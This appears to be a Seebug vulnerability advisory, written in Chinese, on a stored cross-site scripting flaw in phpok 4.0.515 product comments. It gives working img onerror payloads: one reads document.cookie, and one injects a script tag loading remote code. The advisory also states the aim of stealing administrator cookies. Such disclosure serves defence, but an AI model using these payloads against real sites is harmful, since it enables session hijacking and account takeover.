phpok存储型跨站

2014-05-27T00:00:00
ID SSV:94648
Type seebug
Reporter Root
Modified 2014-05-27T00:00:00

Description

简要描述:

phpok4.0.515过滤不严格,导致存储型跨站产生,利用此漏洞我们可以盗取用户cookie(包括管理员)、钓鱼,修改用户信息等等。

详细说明:

phpok4.0.515在产品展示模块的商品评论处没有对用户评论进行过滤,导致存储型XSS漏洞。

漏洞证明:

官方下载地址:http://www.phpok.com/phpok.html 测试浏览器:测试浏览器:IE10、Firefox29.0.1、Chrome33.0.1750.149 m 1、在用户评论处输入以下内容,<img src=x onerror=alert(documnet.cookie)>

<img src="https://images.seebug.org/upload/201405/2711103766afa57767d3b3424c70057f9e9d8469.png" alt="phpok.png" width="600" onerror="javascript:errimg(this);">

2、其他用户查看商品信息时或用户评论时,漏洞触发

<img src="https://images.seebug.org/upload/201405/2711111853be630b8ff60484aec8c12311e2a28c.png" alt="phpok2.png" width="600" onerror="javascript:errimg(this);">

3、管理员登录系统,审核用户评论时,漏洞触发

<img src="https://images.seebug.org/upload/201405/271111488fbf46cb7d074e63b23f81c811d38635.png" alt="phpok4.png" width="600" onerror="javascript:errimg(this);">

4、使用Firebug查看页面源代码:

<img src="https://images.seebug.org/upload/201405/271112159bc8b189f25665b1f390b4c019554e43.png" alt="phpok3.png" width="600" onerror="javascript:errimg(this);">

5、修改利用利用代码为<img src=x onerror=d=document;e=d.createElement('script');e.src='http://127.0.0.1/eXploit.js';d.body.appendChild(e);//">加载本地脚本

<img src="https://images.seebug.org/upload/201405/271113128fc88ce768cb2bd1833c220a750a64cf.png" alt="phpok.png" width="600" onerror="javascript:errimg(this);">

6、使用Firebug查看源代码:

<img src="https://images.seebug.org/upload/201405/27111416a53ff052d8e00027bab5553f3a042dcc.png" alt="2.png" width="600" onerror="javascript:errimg(this);">

成功加载本地脚本,通过修改本地脚本代码,我们可以对系统进行更严格的破坏